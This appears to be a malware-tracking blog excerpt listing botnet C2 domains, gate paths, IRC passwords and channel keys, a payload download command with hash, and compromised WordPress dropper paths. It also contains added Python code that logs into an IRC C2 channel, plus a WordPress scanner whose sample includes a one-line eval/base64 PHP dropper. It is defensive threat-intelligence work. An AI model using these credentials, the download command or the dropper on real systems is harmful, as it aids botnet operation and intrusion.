f0001.info/f0010.info/thismynew1.info (ngrBot hosted by Czech Republic Zlin Fdcservers.net)

Resolved: [f0001.info] To []
Resolved: [f0010.info] To []
Resolved: [thismynew1.info] To []
mom002.net not active now
Server:
Server Password:
Username: jhdkutg
Nickname: n{DE|XPa}jhdkutg
Channel: #bon2 (Password: speedd)
Channeltopic: :~pu hxxp://hotfile.com/dl/196250384/528b038/bonkapawes.exe f931d3eb10db2822e2f5d0b989e2a5b4 ~s -o ~s
Download URLs:
hxxp:// (api.wipmania.com)
hxxp:// (hotfile.com)
hxxp:// (s251.hotfile.com)
hxxp:// (hotfile.com)
hxxp:// (s251.hotfile.com)
Hosting infos: http://whois.domaintools.com/

www.yahgodz.com (Andromeda http botnet hosted by dataclub.biz)

Resolved www.yahgodz.com to
Server: www.yahgodz.com
Gate file: /http/image.php
Additional domains:
bighecks.net/http/image.php (Missing gate file, hosted at worldstream.nl)
sonic4us.ru/http/image.php (Pointed at
imageshells.com/admin/image.php (Missing gate file, hosted at worldstream.nl)
All of these are mystical’s domains, used for various nefarious purposes in the past. A quick google shows that he’s been loading onto this

privategallerie.info (Andromeda http botnet hosted by vmbox.co)

Resolved privategallerie.info to
Server: privategallerie.info
Gate file: /admin/hippo/image.php
Bitcoin mining info: http://pr3m1era_quio:mota@eu.triplemining.com:8344
A previously posted andromeda botnet had a similar folder path to the gate file.
Hosting infos: http://whois.domaintools.com/

aeonhf.net (Smoke loader http botnet proxied by cloudflare)

Resolved aeonhf.net to (Cloudflare ips)
Server: aeonhf.net
Alternate domain: aminserve.info (Currently has non-responsive nameservers)
Gate file: /admin/index.php
This is the latest skid who uses cloudflare to help host his botnet. Maybe this time they’ll do something about it?
Hosting infos: ecatel.info
Edit: CloudFlare received your abuse report dated February 24, 2013 regarding: aeonhf.net

mikimouse.net (ngrbot irc botnet hosted by yisp.nl)

Resolved mikimouse.net to
Server: mikimouse.net (Alternate domains: mikimouse.org, mikispace.org)
Port: 1863
Server password: jobs
Channel: #jobs
Topic for #jobs is:
Topic for #jobs set by h at Sat Feb 23 19:28:30 2013
This is the same bot, port and spreading method as a previously posted botnet. However that had been sinkholed so it appears
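The two ngrBot posts above (f0001.info and mikimouse.net) record exactly what a tracker needs to sit in the C2 channel and log what the operator pushes: server password, nickname format, channel and channel key, and the topic that carries the download command. The helper below is an added example, not the blog's tooling: it builds that IRC login sequence, parses the server's topic replies (332/333 and live TOPIC changes, plus PING and the usual rejection numerics), and pulls the download URL and MD5 out of a topic. The server name, the tracker nick and the second topic in the sample session are constructed; the first topic is the one recorded for #bon2 above.

```python
# Added example (not code from the blog): a minimal IRC C2 tracker helper.
# It builds the login an ngrBot-style IRC C2 expects (server password, nick,
# channel key) and parses server replies to record the channel topic, which
# is where the download command lives.
import re

IRC_LINE = re.compile(r'^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>.*))?$')
URL_RE = re.compile(r'h(?:xx|tt)ps?://\S+')      # accepts blog-style hxxp:// defanging
MD5_RE = re.compile(r'\b[0-9a-fA-F]{32}\b')


def build_login(nickname, username, channel, server_password=None, channel_key=None):
    """Raw lines a tracker sends before it can see the topic.
    PASS must come first (RFC 2812); the channel key rides on JOIN."""
    lines = []
    if server_password:
        lines.append(f"PASS {server_password}")
    lines.append(f"NICK {nickname}")
    lines.append(f"USER {username} 8 * :{username}")
    lines.append(f"JOIN {channel} {channel_key}" if channel_key else f"JOIN {channel}")
    return [line + "\r\n" for line in lines]


def parse_line(raw):
    """Split one server line into (prefix, command, args); the trailing ':' arg is kept whole."""
    m = IRC_LINE.match(raw.rstrip("\r\n"))
    if not m:
        return None
    prefix, cmd, params = m.group("prefix"), m.group("cmd"), m.group("params") or ""
    if params.startswith(":"):
        args = [params[1:]]
    elif " :" in params:
        middle, trailing = params.split(" :", 1)
        args = middle.split() + [trailing]
    else:
        args = params.split()
    return prefix, cmd, args


def new_state():
    return {"topics": {}, "topic_set_by": {}, "errors": []}


def handle(raw, state):
    """Update tracker state from one server line; return a reply to send, or None."""
    parsed = parse_line(raw)
    if parsed is None:
        return None
    _prefix, cmd, args = parsed
    if cmd == "PING":                  # keep the session alive
        return f"PONG :{args[-1]}\r\n"
    if cmd == "332":                   # RPL_TOPIC: <nick> <channel> :<topic>
        state["topics"].setdefault(args[1], []).append(args[2])
    elif cmd == "333":                 # RPL_TOPICWHOTIME: <nick> <channel> <setter> <unixtime>
        state["topic_set_by"][args[1]] = (args[2], int(args[3]))
    elif cmd == "TOPIC":               # live topic change pushed by the operator
        state["topics"].setdefault(args[0], []).append(args[1])
    elif cmd == "433":
        state["errors"].append("nickname in use")
    elif cmd == "464":
        state["errors"].append("server password rejected")
    elif cmd == "475":
        state["errors"].append("channel key rejected")
    return None


def extract_iocs(topic):
    """Pull download URLs and MD5 hashes out of a topic line, URLs defanged for reporting."""
    urls = [u.replace("http", "hxxp", 1) for u in URL_RE.findall(topic)]
    return {"urls": urls, "md5": MD5_RE.findall(topic)}


def run_session(server_lines):
    """Feed captured or constructed server lines through the tracker; return (state, replies)."""
    state, replies = new_state(), []
    for line in server_lines:
        reply = handle(line, state)
        if reply:
            replies.append(reply)
    return state, replies


# Constructed session: server name, tracker nick and the second topic are made up;
# the first topic is the one recorded for #bon2 in the f0001.info post.
SAMPLE_SESSION = [
    "PING :1361647710",
    ":irc.example.invalid 001 n{DE|XPa}tracker :Welcome",
    ":irc.example.invalid 332 n{DE|XPa}tracker #bon2 :~pu http://hotfile.com/dl/196250384/528b038/bonkapawes.exe f931d3eb10db2822e2f5d0b989e2a5b4 ~s -o ~s",
    ":irc.example.invalid 333 n{DE|XPa}tracker #bon2 h 1361647710",
    ":h!h@h TOPIC #bon2 :~pu http://example.invalid/update.exe 00112233445566778899aabbccddeeff",
]

if __name__ == "__main__":
    for line in build_login("n{DE|XPa}tracker", "tracker", "#bon2", channel_key="speedd"):
        print(">>", line.strip())
    state, replies = run_session(SAMPLE_SESSION)
    for topic in state["topics"]["#bon2"]:
        print(topic, "->", extract_iocs(topic))
```

Topics are kept as a history per channel rather than overwritten, because the operator swapping the payload URL (a TOPIC push mid-session) is exactly the event worth logging; the 464/475 numerics tell you quickly whether the recorded server password or channel key has been rotated since the post.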

616design.info (Pony loader and Zeus banking malware hosted by fastit.net)

Resolved 616design.info to
Pony Server: 616design.info
Gate file: /forum/pony/gate.php
This is by the same guy as this winlocker and andromeda bot. The server seems to be down at the moment, most likely due to zeus tracker posting the zeus bot I located on the same ip.
Zeus Server: oppspeedy.co.ua
Gate file: /forum/33/gate.php
Config file:

tommyslav.name (Ginemo winlocker hosted by justhost.in.ua)

Resolved tommyslav.name to
I saw Malekal tweet that someone was using an exploit kit on adf.ly to distribute andromeda. I had already posted the andromeda, and had suspected that it was the cracked version. I just entered the gate info into the builder, ran the build and watched it download this.
Server: tommyslav.name
Gate

(Citadel banking malware hosted by balticservers.com)

Gate file:
Config droppers (appear to be compromised sites):
shadowsfromlight.com/wp-content/upgrade/file.php
www.danainvestment.com/wp-content/upgrade/file.php
gregsmission.org/wp-content/upgrade/file.php
luna.pgnstudio.com/wp-content/upgrade/file.php
On gregsmission.org WP-Sentinel seems to have failed to stop the initial compromise, but is now preventing the dropper from functioning.
Sample is located here
http://whois.domaintools.com/
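All four Citadel config droppers above sit at the same place on compromised WordPress installs, wp-content/upgrade/file.php. That directory is WordPress's scratch space for update archives and holds no PHP of its own, so a site owner can treat any .php file there as planted. The scanner below is an added example, not from the post or from WordPress: it walks that directory, flags every PHP-like file, and notes whether the file's head uses the usual obfuscation wrappers. The sample site it builds (a placeholder update archive and a one-line eval/base64 dropper) is constructed for the demonstration.

```python
# Added example (not from the post): scan a WordPress document root for PHP
# planted under wp-content/upgrade/, the path the Citadel config droppers
# above were served from. Assumption: core WordPress keeps no PHP there (it is
# a scratch directory for update archives), so any .php file is a finding.
import os
import re
import tempfile

SUSPECT_DIRS = ("wp-content/upgrade",)
PHP_EXT = re.compile(r"\.(?:php\d?|phtml|phar)$", re.IGNORECASE)
# Common obfuscation wrappers in PHP droppers; a hit is a hint, not proof.
OBFUSCATION = re.compile(rb"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\(", re.IGNORECASE)


def scan_wordpress(root):
    """Return one finding per PHP-like file found under the suspect directories."""
    findings = []
    for rel in SUSPECT_DIRS:
        top = os.path.join(root, rel)
        if not os.path.isdir(top):
            continue
        for dirpath, _dirs, files in os.walk(top):
            for name in files:
                if not PHP_EXT.search(name):
                    continue
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    head = fh.read(1 << 16)          # first 64 KiB is enough for the wrapper check
                findings.append({
                    "path": os.path.relpath(path, root).replace(os.sep, "/"),
                    "size": os.path.getsize(path),
                    "obfuscation": bool(OBFUSCATION.search(head)),
                    "mtime": int(os.path.getmtime(path)),
                })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_site():
    """Constructed WordPress tree: a legitimate-looking update archive plus a planted dropper."""
    root = tempfile.mkdtemp(prefix="wp-")
    upgrade = os.path.join(root, "wp-content", "upgrade")
    os.makedirs(upgrade)
    with open(os.path.join(upgrade, "akismet.zip"), "wb") as fh:
        fh.write(b"PK\x03\x04 constructed placeholder")              # not PHP: ignored
    with open(os.path.join(upgrade, "file.php"), "wb") as fh:
        fh.write(b"<?php eval(base64_decode($_POST['c'])); ?>")      # constructed dropper
    with open(os.path.join(root, "wp-content", "index.php"), "wb") as fh:
        fh.write(b"<?php // Silence is golden.")                     # normal WP file, outside the scan
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for finding in scan_wordpress(site):
        print(finding)
```

Run it against the document root of a real install (the same check works for wp-content/uploads, which should not serve PHP either, if you add it to SUSPECT_DIRS) and compare the mtime of anything it reports against the web server's access log: the first POST to that path usually marks the initial compromise, which is the window WP-Sentinel missed on gregsmission.org.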

92mb samples for analysis

This package has a lot of IRC bot samples, banking trojans and Linux bot samples. Samples are provided only for analysis purposes; don't run them on your machine, use VMware. Source